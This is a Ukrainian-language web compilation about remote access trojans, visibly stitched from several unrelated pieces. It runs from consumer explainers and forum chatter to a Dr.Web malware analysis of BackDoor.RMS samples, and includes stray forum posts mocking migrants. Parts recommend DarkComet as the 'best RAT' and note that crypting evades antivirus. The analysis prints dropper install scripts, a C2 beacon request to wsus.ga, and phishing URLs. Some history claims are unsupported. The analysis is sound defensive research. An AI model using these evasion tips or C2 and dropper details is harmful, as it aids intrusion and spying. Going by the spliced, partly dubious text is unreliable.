Що таке ратник у комп'ютері
Троян віддаленого доступу (RAT) - це тип шкідливого програмного забезпечення, яке дозволяє хакерам відстежувати та контролювати ваш комп'ютер або мережу. Але як працює RAT, чому хакери їх використовують та як їх уникнути?
Якщо вам колись доводилося викликати техпідтримку для ПК, то ви, мабуть, знайомі з магією віддаленого доступу. Коли віддалений доступ увімкнено, авторизовані комп'ютери та сервери можуть контролювати все, що відбувається на вашому ПК. Вони можуть відкривати документи, завантажувати програмне забезпечення і навіть переміщати курсор екраном у режимі реального часу.
RAT - це тип шкідливого програмного забезпечення, дуже схожий на легальні програми віддаленого доступу. Основна відмінність, звичайно, полягає в тому, що RAT встановлюються на комп'ютер без відома користувача. Більшість легітимних програм віддаленого доступу створено для технічної підтримки та обміну файлами, а RAT – для стеження, злому або знищення комп'ютерів.
Подібно до більшості шкідливих програм, RAT вбудовуються в легітимні файли. Хакери можуть прикріпити RAT до документа електронною поштою або у великому програмному пакеті, наприклад у відеогрі.
Рекламні оголошення та шкідливі веб-сторінки також можуть містити RAT, але більшість браузерів запобігають автоматичному завантаженню з веб-сайтів або повідомляють вас, коли сайт небезпечний.
Взагалі, RAT не уповільнює роботу вашого комп'ютера, і хакери не завжди видають себе, видаляючи файли або переміщуючи курсор по екрану. У деяких випадках користувачі заражені RAT, роками не помічають нічого поганого.
Більшість комп'ютерних вірусів зроблено з єдиною метою. Кейлогери автоматично записують все, що ви вводите, здирники обмежують доступ до вашого комп'ютера або його файлів до тих пір, поки ви не заплатите, а рекламне програмне забезпечення видає сумнівну рекламу на ваш комп'ютер для отримання прибутку.
Але щури особливі. Вони дають хакерам повний анонімний контроль за зараженими комп'ютерами.
Крім того, хакери можуть використовувати RAT для прихованої активації веб-камери або мікрофон комп'ютера.
Хакер з RAT може стерти жорсткий диск, завантажити нелегальний контент з Інтернету через ваш комп'ютер. Хакери також можуть віддалено керувати вашим комп'ютером, щоб виконувати незаконні дії в Інтернеті від вашого імені, або використовувати вашу домашню мережу як проксі-сервер для анонімного скоєння злочинів.
Хакер також може використовувати RAT, щоб взяти під контроль домашню мережу та створити ботнет.
По суті, ботнет дозволяє хакеру використовувати ваші комп'ютерні ресурси для виконання часто нелегальних завдань, таких як DDOS-атаки, майнінг біткойнів, хостинг файлів та торрент. Іноді цю техніку використовують кібер-злочинці або під час кібервійни.
Не турбуйся. Щур легко уникнути
Якщо ви бажаєте уникнути RAT, не завантажуйте файли з джерел, яким ви не можете довіряти.
Ви не повинні відкривати вкладення електронної пошти від незнайомих людей (або потенційних роботодавців)
Ви не повинні завантажувати ігри або програмне забезпечення з не офіційних веб-сайтів і не повинні завантажувати торрент-файли, якщо вони не з надійного джерела.
Оновлення вашого браузера та операційної системи за допомогою виправлень безпеки.
Звичайно, ви повинні увімкнути антивірусне програмне забезпечення.Захисник Windows входить до комплекту поставки вашого ПК (і, чесно кажучи, це відмінне антивірусне програмне забезпечення), але якщо вам потрібний додатковий захист, ви можете завантажити комерційне антивірусне програмне забезпечення.
Оскільки більшість хакерів використовують відомі RAT (замість того, щоб розробляти власні), антивірусне програмне забезпечення є найпростішим способом пошуку і видалення RAT з вашого комп'ютера.
Якщо у вас запущений антивірус, але ви все ще параноїдально відчуваєте, що на вашому ПК є RAT, ви завжди можете відформатувати комп'ютер . Це рішучий захід, але ймовірність успіху становить 100%. Якщо антивірусне програмне забезпечення не знаходить RAT, то, ймовірно, у вас немає RAT.
Що ви думаєте про шкідливі програми? Дайте нам знати у коментарях нижче.
Насправді шпигунська програма RAT це одна з найбільш небезпечних шкідливих програм, яка дозволяє зловмиснику отримати не просто доступ до вашого комп'ютера, але й повний контроль над ним. Використовуючи програму RAT, зломщик може віддалено встановити шпигун клавіатури або іншу шкідливу програму. Також за допомогою даної програми хакер може заразити файли і багато чого наробити без вашого відома.
Як працює програма RAT?
RAT складається з двох частин: клієнт та сервер. У самій програмі RAT(Клієнт) яка працює на комп'ютері зловмисника створюється програма сервера, яка посилається жертві. Після запуску жертвою сервера у вікні програми клієнта з'являється віддалений комп'ютер (хост), до якого можна підключитися. Все. з цього моменту комп'ютер жертви під повним контролем зловмисника.
Можливості трояна RAT
Популярні RAT-програми
- DarkComet Rat
- CyberGate
- ProRAT
- Turkojan
- Back Orifice
- Cerberus Rat
- Spy-Net
Яка найкраща програма RAT?
Найкращий троян RAT на сьогодні це DarkComet Rat(на хаЦкерському жаргоні просто Камета)
Як відбувається зараження RAT-трояном?
Зараження вірусом RAT відбувається майже як іншими шкідливими програмами через:
- Масове зараження на варез та торрент сайтах.
- Скрипти на сайтах, які без вашого відома завантажують RAT на ваш комп'ютер.
- У більшості випадків зараження RAT-трояном відбувається не від масового, а від цілеспрямоване зараження вашого комп'ютера друзями або колегами.
До речі не завжди антивірусне може запобігти зараженню, деякі антивіруси просто не детектують шкідливість, тому що сьогодні вже ніхто не посилає просто трояна, сьогодні його попередньо криптують (що таке крипт і як це роблять ми розповімо в іншій статті).
Як запобігти зараженню троянською програмою RAT?
Як зрозуміти, що у вас троянська програма RAT?
Зрозуміти, що у вас на комп'ютері встановлено РАТ, дуже не легко, але можна. Ось ознаки, які можуть говорити про наявність троянської програми на вашому комп'ютері:
- Дивна мережна активність у фаєрволі, зокрема високий вихідний трафік.
- Комп почав гальмувати чи швидкість інтернету значно просіла.
- У вас забрали пароль від соц. мереж чи пошти.
- Підозрювальний трафік у сніффері.
Як вилікувати заражений трояном комп'ютер?
Виявити троян RAT досить складно. Можна скачати безкоштовні антивіруси з оновленими базами, наприклад хороший на мій погляд сканер AVZ і просканувати комп'ютер.Насправді якщо ви мало знаєтеся на комп'ютерах легше не шукати голку в стозі, а попередньо зберігши важливі документи відформатувати комп'ютер і встановити Windows заново.
До речі, встановлюючи зламану Windows, ви ризикуєте заразитися вірусом вже на етапі установки. Так як деякі ліві зборки, які лунають в мережі, мають вже вшиті закладки, шпигуни, віруси, приховані радміни, рмси та іншу красу. Я знав одного комп'ютерного майстра, який сам того не знаючи, встановлював на машини клієнтів ліву збірку Windows, знамениту протроянену ZverCD.
Схожі статті
Швидке встановлення віртуальних машин на Linux
Як встановити Google Chrome на Kali Linux
Флешка Kali Linux з можливістю збереження Persistence
10 коментарів
та без крипта не прокотить, антивір пропалить відразу.
а крипт грошей коштує
крипт був безкоштовний, безкоштовний є і безкоштовним буде.
хороша стаття але автор забув написати ще про рат PI
Усі відповіді на ваші запитання будуть в окремій статті.
Видалити ратник простіше нікуди, потрібно зайти в автозавантаження і видалити всі невідомі програми з автозавантаження або все, потім перезавантажити ПК також можна заглянути в планувальник завдань і подивитися там якісь дивні завдання та видалити їх.
DarkComet має таку функцію: Persistant Process і Persistent Startup. Коли ти спробуєш закрити процес, не вийде. Коли спробуєш видалити автозавантаження: не вийде. Навіть у безпечному режимі не прокотить! Ніяк! І що чайник робитиме? А якщо він добре закриптований, його ніяк не знайти! І антивірус його видаляти не буде! І жодна програма не допоможе, крім переустановки Windows.
Троянець віддаленого доступу, або RAT, є одним із найбільш шкідливих типів шкідливих програм, про які тільки можна подумати.
Вони можуть завдати усіляких пошкоджень, а також можуть бути відповідальними за дорогі втрати даних.
З ними треба активно боротися, тому що, крім того, що вони дуже небезпечні, досить поширені.
Сьогодні ми зробимо все можливе, щоб пояснити, що вони собою представляють і як вони працюють, а також дамо вам знати, що можна зробити, щоб захиститися від них.
Ми розпочнемо наше обговорення сьогодні з пояснення того, що таке RAT.
Ми не заглиблюватимемося в технічні деталі, але зробимо все можливе, щоб пояснити, як вони працюють і як вони до вас потрапляють.
Далі, намагаючись не здатися надто параноїдальним, ми побачимо, що RAT можна розглядати майже як зброю.
Насправді деякі з них були використані як такі.
Після цього ми представимо кілька найвідоміших RAT.
Це дасть вам найкраще уявлення про те, на що вони здатні.
Потім ми побачимо, як можна використовувати інструменти виявлення вторгнень для захисту від RAT, і розглянемо деякі з найкращих із цих інструментів.
Отже, що таке RAT?
Давайте проаналізуємо ім'я.
Троянська частина розповідає про те, як поширюється шкідливе програмне забезпечення.
Це стосується давньогрецької історії про троянського коня, який Улісс побудував, щоб повернути місто Трою, яке було обложено протягом десяти років.
У контексті комп'ютерного шкідливого ПЗ, троянський кінь (або просто троян) є шкідливим ПЗ, що поширюється якось ще.
Наприклад, гра, яку ви завантажуєте та встановлюєте на свій комп'ютер, насправді може бути троянським конем і містити певний шкідливий код.
Що стосується віддаленого доступу RAT, це пов'язано з тим, що робить шкідлива програма.
Простіше кажучи, це дозволяє його автору мати віддалений доступ до зараженого комп'ютера.
І коли він отримує віддалений доступ, він практично не має обмежень на те, що він може зробити.
Це може варіюватися від вивчення вашої файлової системи, перегляду ваших дій на екрані, збирання ваших облікових даних для входу в систему або шифрування ваших файлів, щоб потім вимагати викуп.
Він також може вкрасти ваші дані або, що ще гірше, дані вашого клієнта.
Після встановлення RAT комп'ютер може стати концентратором, звідки атаки будуть запущені на інші комп'ютери в локальній мережі, що дозволить обійти будь-який захист периметра.
RAT в історії
На жаль, rat існує вже більше десяти років.
Вважається, що ця технологія відіграла свою роль широкомасштабному розграбуванні американської технології китайськими хакерами ще в 2003 році.
Розслідування в Пентагоні виявило крадіжку даних у американських оборонних підрядників, причому секретні дані про розробку та випробування були передані до місць розташування в Китаї.
Можливо, ви пам'ятаєте, як відключалися енергосистеми на східному узбережжі США у 2003 та 2008 роках.
Вони також були простежені у Китаї та, мабуть, їм сприяли RAT.
Хакер, який може запустити RAT в систему, може скористатися будь-яким програмним забезпеченням, яке є у розпорядженні користувачів зараженої системи, навіть не помічаючи цього.
RAT як зброя
Зловмисний розробник RAT може взяти під контроль електростанції, телефонні мережі, ядерні об'єкти чи газопроводи.
Таким чином, RAT не тільки становлять загрозу для корпоративної безпеки.
Вони також можуть дозволити націям атакувати ворожу країну.
Як такі їх можна розглядати як зброю.
Хакери по всьому світу використовують RAT для стеження за компаніями та крадіжки їх даних та грошей.
Тим часом проблема RAT тепер стала питанням національної безпеки для багатьох країн, зокрема Росії.
США, яка спочатку використовувалася для промислового шпигунства і саботажу китайськими хакерами, стала цінувати міць RAT і інтегрувала їх у свій військовий арсенал.
Тепер вони є частиною стратегії наступу, відомої як гібридна війна.
Декілька відомих RAT
Давайте подивимося на деякі з найвідоміших RAT.
Наша ідея тут не в тому, щоб прославити їх, а в тому, щоб дати уявлення про те, наскільки вони різноманітні.
Back Orifice
Початкова схема експлуатувала вразливість у Windows 98.
Пізніші версії, які працювали в нових операційних системах Windows, називалися Back Orifice 2000 і Deep Back Orifice.
Ця RAT здатна приховувати себе в операційній системі, що робить її особливо складною для виявлення.
Однак сьогодні більшість систем захисту від вірусів використовують як сигнатури виконувані файли Back Orifice і поведінку оклюзії.
Відмінною рисою цього програмного забезпечення є те, що воно має просту у використанні консоль, яку зловмисник може використовувати для навігації та перегляду зараженої системи.
Після встановлення ця серверна програма зв'язується з клієнтською консоллю за стандартними мережевими протоколами.
Наприклад, відомо, що використовується номер порту 21337.
DarkComet
DarkComet був створений ще у 2008 році французьким хакером Жаном-П'єром Лесуером, але привернув увагу спільноти кібербезпеки лише у 2012 році, коли було виявлено, що африканський хакерський підрозділ використовує цю систему для націлювання на уряд та збройні сили США.
DarkComet характеризується простим у використанні інтерфейсом, який дозволяє користувачам, які практично не мають технічних навичок, виконувати хакерські атаки.
Це дозволяє шпигувати через кейлоггінг, захоплення екрану та збирання пароля.
Керуючий хакер також може керувати функціями живлення віддаленого комп'ютера, дозволяючи вмикати або вимикати комп'ютер віддалено. Функції зараженого комп'ютера також можна використовувати для використання комп'ютера як проксі-сервера та маскування особи під час рейдів на інших комп'ютерах. Проект DarkComet був покинутий його розробником у 2014 році, коли було виявлено, що він використовується сирійським урядом, щоб шпигувати за його громадянами.
Mirage
Після дуже активної шпигунської кампанії з 2009 по 2015 рік гурт замовк.
Mirage був основним інструментом гурту з 2012 року.
Виявлення варіанта Mirage, названого MirageFox у 2018 році, є натяком на те, що гурт може повернутися в дію.
MirageFox було виявлено у березні 2018 року, коли він використовувався для стеження за урядовими підрядниками Великобританії.
Щодо оригінальної Mirage RAT, вона використовувалася для атак на нафтову компанію на Філіппінах, тайванських військових, канадську енергетичну компанію та інші цілі у Бразилії, Ізраїлі, Нігерії та Єгипті.
Цей RAT постачається вбудованим у PDF.
Відкриття його призводить до виконання скриптів, які встановлюють RAT.
Ця інформація включає швидкість процесора, обсяг пам'яті і використання, ім'я системи та ім'я користувача.
Антивірусне програмне забезпечення іноді марно поводиться при виявленні та запобіганні RAT.
Це пов'язано частково з їхньою природою.
Вони ховаються як щось цілком законне.
З цієї причини вони найчастіше виявляються системами, які аналізують комп'ютери щодо ненормального поведінки.
Такі системи називаються системами виявлення вторгнень IDS.
Ми шукали на ринку найкращі системи виявлення вторгнень.
Наш список містить набір сумлінних систем виявлення вторгнень та іншого програмного забезпечення, яке має компонент виявлення вторгнень, або яке може використовуватися для виявлення спроб вторгнення.
Як правило, вони краще ідентифікують трояни віддаленого доступу, ніж інші засоби захисту від шкідливих програм.
Це стосується ОС x32, які не оновлювалися в центрі оновлення Windows і тому мають дірки, за 3 роки ремонту та настроювання ОС було багато помічено та знешкоджено таких троянів!
ПОСИЛАННЯ НА ДЖЕРЕЛА, ПРОГУ І ФОРУМИ Я ВИДАЛИВ НА ПРОХАННЯ МОДЕРАТОРА І У ЗВ'ЯЗКУ З МІНУСАМИ, КОМУ БУДЕ ЦІКАВА ДАННА ТЕМУ ВІДПИШУ В КОМЕНТАХ, ЗАРАНІШЕ СПАСИТИ
Q: Що таке DarkComet?
A: Дарк Комет(у народі просто комета) це ратник, тобто вірус, який дозволяє керувати вашим комп'ютером: маніпулювати файлами, переглядати ваш робочий стіл і т.д.:
Q: Але ж у мене стоїть антивірус ліцензійний, як я можу заразитися?
A: Легко! Якщо вірус закриптований (почитайте в гугле, що таке криптори), то він не буде ідентифікований антивірусом, як вірус, а якщо це ще приват криптор, ви можете ніколи не дізнатися, що на вашому комп'ютері завівся вірус. Отже, у цій ситуації антивірус не є корисним.
Часто буває, що ми заражаємося цим вірусом і багато хто не розуміє як видалити.
І тепер я зробив огляд на програму DarkComet Remover для видалення цього вірусу
Ратник – що за слово таке? Завжди було бекдор
я, звичайно, все розумію, але чому тут народ так агресивно налаштований! тільки одні мінуси встановлюють, я доки нуб у цій платформі але хіба я запостив поганий контент?
Кудись гонор зник, та й пам'ять відбило
Був тут не далі тип, який тиранив всю округу зі своїм песелем. Але щось пішло в нього не за планом.
Професіонал своєї справи
Відповідь на пост «Мігранти вирішили атакувати поляків колодою, але добігти до паркану не змогли – їх облили з водомету»
Щомісяця глядачі обирають одного мігранта, якого пускають до Польщі.
Без шуму та пилу: розбір RAT-троянів на базі Remote Utilities
У листопаді 2020 року вірусна лабораторія "Доктор Веб" зафіксувала розсилку фішингових листів корпоративним користувачам. Зловмисники спробували застосувати класичний метод соціальної інженерії, щоб змусити потенційних жертв відкрити вкладення. Як шкідливе навантаження листи містили троянські програми, що забезпечують приховану установку та запуск утиліти Remote Utilities, настановні компоненти якої також знаходилися у складі вкладення. У разі несприятливого збігу обставин, комп'ютери співробітників були б доступні для віддаленого управління без будь-яких візуальних ознак роботи програми. У статті ми розглянемо механізми поширення та зараження RAT-троянів, що використовуються.
Сценарій атаки
Виявлені нами зразки можна поділити на 2 групи.
- архіви, що саморозпаковуються, які містили оригінальні виконувані файли Remote Utilitites і шкідливий модуль, що завантажується за допомогою DLL Hijacking. Цей модуль запобігає відображенню вікон та інших ознак роботи програми, а також повідомляє зловмисника про її запуск та встановлення. Детектується Dr.Web як BackDoor.RMS.180.
- архіви, що саморозпаковуються, які містили оригінальний інсталяційний модуль Remote Utilities і заздалегідь налаштований MSI-пакет, що забезпечує тиху установку програми для віддаленого управління і подальшу відправку повідомлення про готовність до віддаленого підключення на заданий зловмисником сервер. Детектується Dr.Web як BackDoor.RMS.181.
Приклад листа зі шкідливим вкладенням, що використовує DLL Hijacking:
У доданому архіві знаходиться захищений RAR-архів та текстовий файл із паролем.
З метою конфіденційності вкладення, що відправляється, встановлено автоматичний пароль: 02112020.
В архіві знаходиться дроппер у вигляді RAR'у, що саморозпаковується, всередині якого лежить сам BackDoor.RMS.180.
Нижче наведено приклад листа з вкладенням, що використовує пакет MSI.
Крім архіву зі шкідливим навантаженням (BackDoor.RMS.181) та файлу з паролем тут знаходяться документи-пустушки.
У зв'язку з корпоративною політикою безпеки цей вкладення захищено кодом доступу: 12112020.
У ході дослідження ми також виявили зразок фішингового листа, що містить посилання на дроппер, який запускає встановлення утиліти Remote Utilities з налаштованого MSI-пакету (детектується Dr.Web як BackDoor.RMS.187). Тут задіяно дещо інший механізм поширення корисного навантаження.
«CV_resume.rar» є посиланням на зламаний сайт, звідки походить редирект на інший ресурс для завантаження шкідливого архіву з BackDoor.RMS.187.
Аналіз мережевої інфраструктури, що використовується зловмисниками для поширення BackDoor.RMS.187, дозволив знайти ще кілька компрометованих сайтів, а також зразок трояна Trojan.Gidra. За нашими даними, Trojan.GidraNET.1 використовувався для первинного зараження системи за допомогою фішингового листа з подальшим завантаженням бекдора, який приховано встановлював Remote Utilties.
Докладний розбір алгоритмів роботи виявленого програмного забезпечення читайте у вірусній бібліотеці на нашому сайті. Нижче ми розглянемо ці шкідливі програми.
BackDoor.RMS.180
Троян-бекдор, написаний із використанням компонентів програми Remote Utilities. Основний шкідливий модуль завантажується за допомогою DLL Hijacking.
Архив, що саморозпаковується, запускається скриптом:
;Розміщень нижче коментар містить команди SFX-скрипту Path=%APPDATA%\Macromedia\Temp\ Setup=WinPrint.exe Silent=1 Overwrite=2
Склад дроппера, що саморозпаковується:
- libeay32.dll (f54a31a9211f4a7506fdecb5121e79e7cdc1022e), чистий;
- ssleay32.dll (18ee67c1a9e7b9b82e69040f81b61db9155151ab), чистий;
- UniPrint.exe (71262de7339ca2c50477f76fcb208f476711c802), підписаний дійсним підписом;
- WinPrint.exe (3c8d1dd39b7814fdc0792721050f953290be96f8), підписаний дійсним підписом;
- winspool.drv (c3e619d796349f2f1efada17c9717cf42d4b77e2) - основний шкідливий модуль, що забезпечує приховану роботу Remote Utilities.
118 RemoveYourMom 119 AddFormW 144 ClosePrinter 148 OpenDick 156 DeleteFormW 189 DocumentPropertiesW 190 HyXyJIuHagoToA 195 EnumFormsW 203 Properties
Функції, які відсутні в оригінальному модулі winspool.drv і не мають функціонального навантаження:
Експорти з реальними іменами містять переходи до оригінальних функцій з легітимної бібліотеки, що завантажуються надалі.
Деякі функції API виконуються через покажчики на функції-перехідники:
Функція get_proc шукає необхідну API-функцію розбирання таблиці експорту модуля, потім поміщає знайдену адресу замість функції-перехідника.
На першому етапі завантажує замінену бібліотеку. Ім'я не зашите жорстко, тому завантажує бібліотеку \. Потім проходить свою таблицю експорту та завантажує оригінальні API-функції за ординалами, пропускаючи недійсні функції:
RemoveYourMom OpenDick HyXyJIuHagoToA
Потім бекдор перевіряє, в контексті якого файлу він працює. Для цього перевіряє значення IMAGE_NT_HEADERS.OptionalHeader.CheckSum основного виконуваного модуля:
- значення дорівнює 0x2ECF3 - Перший запуск з WinPrint.exe;
- значення дорівнює 0xC9FBD1 - Робота в контексті UniPrint.exe.
Коли запущено UniPrint.exe, бекдор переходить до виконання основних функцій. Перевіряє, чи має користувач права доступу адміністратора. Потім встановлює права доступу на директорію з модулем:
Після цього записує параметри General і Security у ключ реєстру HKCU\SOFTWARE\WDMPrint та готує значення параметра InternetID за допомогою форматного рядка.
Потім бекдор створює приховані вікна MDICLIENT і RMSHDNLT:
Далі розпочинає перехоплення API-функцій. Для цього використовує бібліотеку MinHook.
Детальна таблиця з описом перехоплюваних функцій знаходиться на сторінці BackDoor.RMS.180 на нашому сайті.
Мережева активність бекдору реалізована в такий спосіб. Спочатку по дескриптору вікна TEdit за допомогою функції GetWindowTextA бекдор отримує InternetIDдля віддаленого підключення. Потім формує GET-запит виду:
GET /command.php?t=2&id= HTTP/1.1 Host: wsus.ga Accept-Charset: UTF-8 User-Agent: Mozilla/5.0 (Windows NT) Connection: close
Потім створює TCP-сокет.Перевіряє значення глобальної змінної, в якій зберігається порт для підключення з використанням протоколу SSL (у зразку, що розглядається, дорівнює нулю). Якщо порт не дорівнює нулю, з'єднання виконується за SSL за допомогою функцій бібліотеки SSLEAY32.dll. Якщо порт не встановлено, бекдор підключається через порт 80.
Далі надсилає сформований запит. Якщо відповідь отримана, то чекає протягом хвилини та повторно надсилає запит з InternetID. Якщо відповіді немає, повторює запит через 2 секунди. Відправлення відбувається у нескінченному циклі.
BackDoor.RMS.181
Досліджений зразок є MSI-пакетом із заздалегідь налаштованими параметрами віддаленого управління, створений за допомогою MSI-конфігуратора зі складу Remote Utilities Viewer. Поширювався у складі саморозпаковується 7z-дропера (52c3841141d0fe291d8ae336012efe5766ec5616).
- host6.3_mod.msi (заздалегідь налаштований MSI-пакет);
- installer.exe (5a9d6b1fcdaf4b2818a6eeca4f1c16a5c24dd9cf), підписаний дійсним цифровим підписом.
;!@Install@!UTF-8! RunProgram="hidcon:installer.exe /rsetup" GUIMode="2" !@InstallEnd@!
Після розпаковування дроппер запускає файл installer.exe, який, у свою чергу, запускає інсталяцію заздалегідь налаштованого MSI-пакету. Інсталятор витягує та приховано встановлює Remote Utilities. Після встановлення надсилає сигнал на сервер, що управляє.
MSI пакет містить всі необхідні параметри для тихої установки Remote Utilities. Установка виконується в Program Files\Remote Utilities - Host відповідно до таблиці Directory.
Відповідно до таблиці CustomAction інсталятор msiexec.exe запускає основний компонент пакету Remote Utilities rutserv.exe з різними параметрами, які забезпечують тиху установку, додавання правил мережного екрана та запуск служби.
Параметри та налаштування підключення заносяться до ключа реєстру HKLM\Remote Utilities\v4\Server\Parameters. Значення параметрів містяться у таблиці Registry:
Параметр CallbackSettings містить адресу сервера, на який відправляється InternetID для прямого підключення.
BackDoor.RMS.187
Досліджений зразок являє собою MSI-пакет із заздалегідь налаштованими параметрами для прихованої установки та запуску Remote Utilities. Поширювався у складі шкідливого RAR-архіву за допомогою розсилки фішингу.
Запускається за допомогою дроппера, який зберігає настановний архів у секції ресурсів під ім'ям LOG. Дроппер зберігає MSI-пакет у директорію %TEMP% під ім'ям KB8438172.msi і потім запускає за допомогою інсталятора msiexec.exe. У дроппері знаходиться шлях до вихідника C:\Users\Kelevra\Desktop\Source\Project1.vbp.
Бекдор повідомляє про готовність до підключення, надсилаючи повідомлення на адресу cerbe[@]protonmail[.]com.
Цей зразок примітний способом розповсюдження. На електронну пошту жертви надходить фішингове лист із посиланням, що маскується під потрібне користувачеві вкладення.
Посилання на завантаження вкладення веде за адресою http[:]//ateliemilano[.]ru/stat/amsweb.php?eTmt6lRmkrDeoEeQB6MOVIKq4BTmbNCaI6vj%2FvgYEbHFcfWecHRVZGMpkK%2BMqevriOYlq9CFe6NuQMfKPP %2B6xw2oPITBvntn2dh0QCN9pV5fzq3T%2FnW270rsYkctA%2FwdvWH1bkEt2AdWnyEfaOwsKsSpyY3azVX0D%2BKOm5.
Потім з цієї адреси відбувається редирект на адресу https[:]//kiat[.]by/recruitment/CV_Ekaterina_A_B_resume.rar, за яким відбувається завантаження шкідливого архіву.
ateliemilano[.] і kiat[.]by — існуючі сайти, причому другий сайт належить кадровому агентству.За нашими даними, вони неодноразово використовувалися для завантаження троянів, а також для переадресації запитів на їхнє завантаження.
У ході дослідження було знайдено й інші скомпрометовані сайти, які використовувалися для поширення аналогічних дропперів із MSI-пакетами. На деяких із них встановлювалися редиректи аналогічного формату, як на сайті ateliemilano[.]. З деяких ресурсів імовірно відбувалося завантаження троянів, написаних на
Visual Basic .NET (Trojan.GidraNET.1), які, зокрема, завантажують шкідливі дроппери на скомпрометовані комп'ютери.
Trojan.GidraNET.1
Досліджений зразок трояна поширювався через компрометовані сайти. Він призначений для збору інформації про систему з її подальшою передачею зловмисникам FTP, а також для завантаження шкідливого дроппера з MSI-пакетом для установки Remote Utilities.
Основна функціональність перебуває у методі readConfig, що викликається з Form1_Load.
На початку своєї роботи збирає про систему таку інформацію:
- зовнішня IP-адреса;
- ім'я користувача;
- ім'я ПК;
- версія ОС;
- відомості про материнську плату та процесор;
- обсяг оперативної пам'яті;
- відомості про диски та розділи;
- мережеві адаптери та їх MAC-адреси;
- вміст буфера обміну.
Отриману інформацію зберігає у файлі, потім робить знімок екрана.
Інформацію про систему надсилає за протоколом FTP на сервер ateliemilano[.].
У коді трояна зашиті логін та пароль від FTP-сервера. До кожного зараженого комп'ютера створюється окрема директорія.
Після надсилання інформації завантажує та запускає файл з іншого скомпрометованого сервера.
Файли, що завантажуються аналогічними зразками, є дропперами, написаними на Visual Basic, що містять MSI-пакети для прихованої установки Remote Utilities, такі як BackDoor.RMS.187.
У дослідженому зразку було знайдено шлях до PDB-файлу: C:\Users\Kelevra\Desktop\Last Gidra + PrintScreen + Loader_ Main\Gidra\obj\Debug\Gidra.pdb. Ім'я користувача Kelevra збігається з ім'ям користувача в дорозі до файлу проекту в дроппері BackDoor.RMS.187: C:\Users\Kelevra\Desktop\Source\Project1.vbp. У аналогічних зразках зустрілися та інші варіанти.
За знайденою нами інформацією можна припустити, що у 2019 році автор Trojan.GidraNET.1 використовував цей троян для первинного зараження через фішингове лист з подальшим завантаженням бекдора, що приховано встановлює Remote Utilties.
Висновок
Бекдори на базі утиліт для віддаленого адміністрування залишаються актуальною загрозою безпеці і досі використовуються для атак на корпоративний сектор. У свою чергу фішингові листи є основним засобом доставки корисного навантаження на комп'ютери, що заражаються. Відмінна риса шкідливих вкладень - архівація корисного навантаження з використанням пароля, що дозволяє листа подолати вбудовані в поштовий сервер засоби захисту. Іншою особливістю є наявність текстового файлу із паролем до підробленого архіву. Крім того, використання шкідливої бібліотеки та атаки DLL Hijacking забезпечує приховане функціонування програмного забезпечення для віддаленого управління на скомпрометованому пристрої.
